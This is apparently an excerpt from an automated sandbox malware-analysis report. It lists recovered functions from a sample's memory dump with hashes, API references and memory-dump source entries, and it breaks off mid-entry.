                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                            • Instruction ID: ffd68ceef75426bab75f8196a401279c741b94261a5dafa296f9e5c69f67c760
                            • Opcode Fuzzy Hash: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                            • Instruction Fuzzy Hash: B0612FB2308215CFD308CF99E580E96B3E5EBA9325B1685BED105CB361E771DC45CB58
                            Function 6CD18520 Relevance: .2, Instructions: 216COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                            • Instruction ID: b47d5266ab453d3dc44a8a71c72e0619665c0b53877a1be9be0a026f74abb039
                            • Opcode Fuzzy Hash: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                            • Instruction Fuzzy Hash: 429190B2C1871A8BD314CF18D88025AB7E0FB88308F49067DED9AA7351D739EA55CBC5
                            Function 6CCA0B66 Relevance: .2, Instructions: 167COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                            • Instruction ID: 75c0f786944a49215c2a9e388d500e46531633b4c2ea6df245561215d6c5a02e
                            • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                            • Instruction Fuzzy Hash: 10518F72F0060A9BDB08CFD8D9956ADBBF1EB88348F24816DD516E7781E7749A42CB40
                            Function 6CCA2EC9 Relevance: .1, Instructions: 136COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                            • Instruction ID: e6aa73080ec5bc195fb22b117f7c7303f51200440d3fca53de9bab792e4c3c97
                            • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                            • Instruction Fuzzy Hash: 8E3114277A441203C70CC96BCD2A79FA1635BD422A70ECB396809DAF55E52CC8534144
                            Function 6CD0EEF0 Relevance: .1, Instructions: 123COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                            • Instruction ID: e5def062a473ab15e71119cc1a0dfa2efb4232f46ea4fcf31a3e33aa38ba03cc
                            • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                            • Instruction Fuzzy Hash: 8F310AB3704A058AF2118F2EC9443567763DBC2368F398765D9A687EFCCA7198079185
                            Function 6CD16820 Relevance: .1, Instructions: 112COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                            • Instruction ID: cb7fb3f1a175ea61562114938c9ad54f1d877e138bb63043c549cd640a132188
                            • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                            • Instruction Fuzzy Hash: 4441B2B29087068BD704CF19C89056EB3E4FF88318F454A6DED5AA7791E330EA16CB91
                            Function 6CD246C0 Relevance: .1, Instructions: 88COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                            • Instruction ID: bda2430c23b5bd4401b7c5b04b96f613f841678383b107bab5a7d3c6419f7e92
                            • Opcode Fuzzy Hash: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                            • Instruction Fuzzy Hash: D62128B1A047E647E7209E6DCCC037577D29BC2309F094279DAB48FA87D17994A2D6A0
                            Function 6CD2A91A Relevance: .1, Instructions: 73COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                            • Instruction ID: 97627474e77d615f6b00eb8ee77d901508a0854e6db8624c062f3521a38e35a7
                            • Opcode Fuzzy Hash: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                            • Instruction Fuzzy Hash: 1121377251442587C301DF2EE888677B3E1FFC431DFA38A2ADA968B591C629D444E6A0
                            Function 6CD2AA00 Relevance: .1, Instructions: 73COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                            • Instruction ID: 4ced1a6b6f9a367f8432db1e6db4ef98bfc8a51c83bb9dbedc78d0127ade0237
                            • Opcode Fuzzy Hash: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                            • Instruction Fuzzy Hash: 092127326021148FC701EF6AD9C469B73E6FFC8369F67CA3DEE8547640C635E60686A0
                            Function 6CC69D66 Relevance: .0, Instructions: 29COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 458c9d413ae81452b1b71685aad0e351932b78cb46f4031b94ad98c0cacf6a1b
                            • Instruction ID: 4bee11dbd6b0d37f587a0502eafec011d95be5a26356e307d3dd0baf3eee9cf9
                            • Opcode Fuzzy Hash: 458c9d413ae81452b1b71685aad0e351932b78cb46f4031b94ad98c0cacf6a1b
                            • Instruction Fuzzy Hash: 32F06532A25324EBDF12DB4DC545B89B3BCEB45B65F1100A6E505DBA50E7B0ED40C7D0
                            Function 6CC69D35 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                            • Instruction ID: b98cda2bf878db20165b119159762357e12e982efdb78b142567d137dfa9e1d2
                            • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                            • Instruction Fuzzy Hash: 9EE08C72A12238FBCB15EB89CA80D8AB3ECEB44A05B1100E6F501D3A10E270DE00C7D0
                            Function 6CCBEB50 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 341COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                            • API String ID: 3519838083-609671
                            • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                            • Instruction ID: 38e5f8bd4fad5fba02fc5b8725b3e9bebe307e20467b7aa17e146ad204f8f0fd
                            • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                            • Instruction Fuzzy Hash: F0D18F71A04209DFCB11CFE4D980AEEB7B5FF45708F24459DE056B3A90EB70A949CBA4
                            Function 6CC59AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                            Download Yara Rule
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 6CC59B07
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6CC59B0F
                            • _ValidateLocalCookies.LIBCMT ref: 6CC59B98
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6CC59BC3
                            • _ValidateLocalCookies.LIBCMT ref: 6CC59C18
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 4e4f1c5f31a2ebf3d240ad24caad46529c9eb9fdbb390ce62cd321cc4f31586c
                            • Instruction ID: 1cc57b9c8c37b4a8db142ca121d384593ba0f0fc3be7175561bfd6161a9cdb36
                            • Opcode Fuzzy Hash: 4e4f1c5f31a2ebf3d240ad24caad46529c9eb9fdbb390ce62cd321cc4f31586c
                            • Instruction Fuzzy Hash: 5B41F170E102189FDF10CF69C880A9EBBB5FF42318F608195E8149BB51F731EA26CB94
                            Function 6CC66E9A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: api-ms-$ext-ms-
                            • API String ID: 0-537541572
                            • Opcode ID: 18f99c423ae23fbe54681c191b2ca6d1b1eeec247785886e670e7b6042b9a61a
                            • Instruction ID: 0b9c611b52f489e8b0fe46f273ece8f6156b38a0fca8b54e01d7b46beabf845e
                            • Opcode Fuzzy Hash: 18f99c423ae23fbe54681c191b2ca6d1b1eeec247785886e670e7b6042b9a61a
                            • Instruction Fuzzy Hash: 30218A32E16A21ABD711866BCEC0B4A3ABCAF07768B150655E915E7D81F730DD0186E1
                            Function 6CC6BEB1 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetConsoleCP.KERNEL32(?,6CC6B0D0,?), ref: 6CC6BEF9
                            • __fassign.LIBCMT ref: 6CC6C0D8
                            • __fassign.LIBCMT ref: 6CC6C0F5
                            • WriteFile.KERNEL32(?,6CC75AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC6C13D
                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CC6C17D
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC6C229
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ConsoleErrorLast
                            • String ID:
                            • API String ID: 4031098158-0
                            • Opcode ID: 556ee03fc92d5b4bab8200a6c5e01b37ce4e595c08bd3c68ee07228278fe1378
                            • Instruction ID: b953422cb32d4c270891d0f1860eb8885c08811f35310a60ba4725fc871e9c06
                            • Opcode Fuzzy Hash: 556ee03fc92d5b4bab8200a6c5e01b37ce4e595c08bd3c68ee07228278fe1378
                            • Instruction Fuzzy Hash: C0D1B871E012489FDF05CFE9C9D09EDBBB5BF09314F28016AE855FBA41E631A946CB50
                            Function 6CB22F60 Relevance: 9.1, APIs: 6, Instructions: 107COMMON
                            Download Yara Rule
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CB22F95
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CB22FAF
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CB22FD0
                            • __Getctype.LIBCPMT ref: 6CB23084
                            • std::_Facet_Register.LIBCPMT ref: 6CB2309C
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CB230B7
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                            • String ID:
                            • API String ID: 1102183713-0
                            • Opcode ID: 054e623c6a4d2562d4dd3e7f2674e66fa93a24d9ca2027b4a715e4219482c546
                            • Instruction ID: 12660e480350965f68c9757864256acb9b131e4b1eeb2281cd5e683d23b6c4ba
                            • Opcode Fuzzy Hash: 054e623c6a4d2562d4dd3e7f2674e66fa93a24d9ca2027b4a715e4219482c546
                            • Instruction Fuzzy Hash: F8418971E006948FDB10CF94C840BAEBBB8FB49714F444118D819ABB90EB78A954CFE2
                            Function 6CC94FA6 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: __aulldiv$__aullrem
                            • String ID:
                            • API String ID: 2022606265-0
                            • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction ID: b29a5a1690c2dc2582c9ebe9cfba4c71434be462e9545c8dbcc438acb268170e
                            • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction Fuzzy Hash: E2218C30901219BFDF208FA5CD40DDFBE79FF817A9F208326B625616E0E2718D55C6A1
                            Function 6CC9A6EC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 183COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC9A6F1
                              • Part of subcall function 6CCA9173: __EH_prolog.LIBCMT ref: 6CCA9178
                            • __EH_prolog.LIBCMT ref: 6CC9A8F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: IJ$WIJ$J
                            • API String ID: 3519838083-740443243
                            • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction ID: d9f640b483fe19e2f7fbc7cdb3d2bbf284b5bc9c61a0348778a30282e516bb33
                            • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction Fuzzy Hash: CF71B130D01255DFDB14CFA4C484BEEBBF0BF54308F1080A9D959ABB91EB74AA09CB95
                            Function 6CC75A0D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 6CC75ADD
                            • _free.LIBCMT ref: 6CC75B06
                            • SetEndOfFile.KERNEL32(00000000,6CC746EC,00000000,6CC6B0D0,?,?,?,?,?,?,?,6CC746EC,6CC6B0D0,00000000), ref: 6CC75B38
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC746EC,6CC6B0D0,00000000,?,?,?,?,00000000,?), ref: 6CC75B54
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: _free$ErrorFileLast
                            • String ID: 8Q
                            • API String ID: 1547350101-4022487301
                            • Opcode ID: a98e22df2d28995218545cef584bfe413efaa721a850a8525b20d7c1aa5332fb
                            • Instruction ID: 3d1fc9418709c21783204f7a9a88ceaeeadf7f918793e7981f33c1e409c07507
                            • Opcode Fuzzy Hash: a98e22df2d28995218545cef584bfe413efaa721a850a8525b20d7c1aa5332fb
                            • Instruction Fuzzy Hash: C141A372A00605ABDF219BA9CC81BEE3B75EF45338F240525E424E7B90FB35C8958775
                            Function 6CCAE418 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCAE41D
                              • Part of subcall function 6CCAEE40: __EH_prolog.LIBCMT ref: 6CCAEE45
                              • Part of subcall function 6CCAE8EB: __EH_prolog.LIBCMT ref: 6CCAE8F0
                              • Part of subcall function 6CCAE593: __EH_prolog.LIBCMT ref: 6CCAE598
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: &qB$0aJ$A0$XqB
                            • API String ID: 3519838083-1326096578
                            • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction ID: 464bcd55354c925141d70715fa0e32be0343b187fedf69dcf7fa4ce892406833
                            • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction Fuzzy Hash: 2B217C71D01258AACB08DBE4D9949DEBFB4AF55318F10406DD41677780EB785A0CCB51
                            Function 6CC5F12A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CC5F1B4,00000000,?,6CC5F235,6CC59C49,00000003,00000000), ref: 6CC5F13F
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CC5F152
                            • FreeLibrary.KERNEL32(00000000,?,?,6CC5F1B4,00000000,?,6CC5F235,6CC59C49,00000003,00000000), ref: 6CC5F175
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 6a46416cc01c03a2b2a669f58b6bf2f247d969076ba800c258e62cca5f65aab0
